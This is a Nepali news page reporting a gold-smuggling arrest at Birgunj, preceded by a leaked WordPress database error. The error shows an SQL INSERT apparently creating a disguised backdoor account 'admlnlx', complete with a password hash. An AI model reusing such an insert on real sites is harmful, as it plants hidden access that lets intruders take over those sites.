WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BNj/te3cuF1MX5Tl0DqREub0.V6HCC1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 20:28:43', '', 'admlnlx', 'admlnlx')
प्रदिप मल्ल,
वीरगन्ज, पुस ७–
वीरगञ्जमा उत्तरी नाकाबाट अवैध रुपमा ल्याइएको पाँच किलोग्राम सुनसहित आज (विहिबार) एक जना पक्राउ परेका छन् ।
पक्राउ पर्नेमा २८ वर्षीय वीरेन लामा रहेका छन् । बा.२८ प. ७४५४ नम्बरको मोटरसाइकलको फिल्टर जालीमा लुकाएर ल्याउँदै गरेको अवस्थामा लामालाई पक्राउ गरिएको वीरगञ्जका प्रहरी नायब उपरीक्षक फणीन्द्र प्रसाईँले जानकारी दिए । बरामद सुनको बजारमूल्य रु.दुई करोड २३ लाख ६० हजार रुपैयाँ रहेको प्रहरीको भनाइ छ ।
उनको साथबाट मोबाइल दुई थान र रु।नौ हजार बरामद गरिएको छ । प्रहरीको जानकारी अुसार सुन वीरगन्जका दारुका नाम गरेका ब्यपारीको रहेको बुझिएको छ ।